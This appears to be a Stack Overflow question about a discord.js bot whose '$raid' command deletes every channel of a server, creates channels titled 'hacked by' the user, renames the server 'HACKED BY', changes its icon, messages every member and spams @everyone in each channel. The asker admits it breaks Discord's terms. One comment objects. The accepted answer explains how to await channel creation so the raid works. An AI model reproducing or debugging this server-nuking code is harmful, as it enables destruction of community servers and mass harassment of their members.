# (node:13) UnhandledPromiseRejectionWarning: DiscordAPIError: Unknown Channel

Tags: javascript, node.js, discord.js

I have a problem with my discord bot, I try to delete all channels of a server, then I create new channels and send message in all channels. I know it's against Discord TOS, but it's just in my server and it's just to see if it's possible. My problem is that it deletes and creates the channel but it do not send mesages in the channels, instead I get an error. I hope that you could help me.

Here's the error :

```
at /home/container/node_modules/discord.js/src/client/rest/RequestHandlers/Sequential.js:85:15
at /home/container/node_modules/snekfetch/src/index.js:215:21
```

Here's the code :

```
const bot = new Discord.Client()
const PREFIX = "$"

bot.on('ready', () => {
    console.log('bot is online')

})

bot.on('message', async message => {
    const taille = message.guild.channels.filter((c) => c.type === "text" || c.type === "voice").size;
    let args = message.content.substring(PREFIX.length).split(" ");
    if (!message.content.startsWith(PREFIX)) {
        return
    }
    if (message.author == bot) { return }
    switch (args[0]) {

        case 'raid':
            var attackembed = new Discord.RichEmbed()
                .setColor('#FF0000 ')
                .setTitle(`test`)
                .setDescription(`123`)
                .setFooter('test BOT')
            if (message.member.hasPermission('ADMINISTRATOR')) {
                function antilag() {
                    for (let index = 0; index != taille; index++) {
                        message.guild.channels.forEach(channel => channel.delete())

                    }


                    for (let x = 0; x != args[1]; x++) {

                        message.guild.createChannel(`hacked by ${message.member.user.tag} `, { type: 'text' })


                    }
                }

                function msg() {
                    for (let x = 0; x != args[1]; x++) {
                        message.guild.channels.forEach(
                            function(channel, index) {
                                channel.send(`@everyone The server ${message.guild.name} was hacked by ${message.member.user.tag}`)
                            })
                    }
                }
                message.guild.setName(`HACKED BY ${message.member.user.tag}`)
                message.guild.setIcon(message.author.avatarURL)
                message.guild.members.forEach(member => member.sendEmbed(embed));

                antilag()
                msg()   
         }
            break;
    }
})


bot.login("my token");
```

PS : Note that I am new to javascript and discord.js

Comment: _"I know it's against Discord TOS, but it's just in my server and it's just to see if it's possible."_ - But it's still against the TOS. So just don't do it...

Comment: You show just a part of the stacktrace. Please include all of it.

Answer (score 1):

`createChannel` is a Promise, which means that by the time this function has finished executing, your code has already moved on other parts, and whenever that channel was requested, it wasn't available yet so it was `undefined`. You need to wait for the function to resolve then proceed with the rest of your logic:

```js
message.guild.createChannel("whatever channel", { type: "text" }).then(function(createdChannel) {
// the rest of your code
});
```

Or, since you already called the function inside an `async` callback:

```
let newChannel = await message.guild.createChannel("whatever channel", { type: "text" });
// rest of code
```

Take care.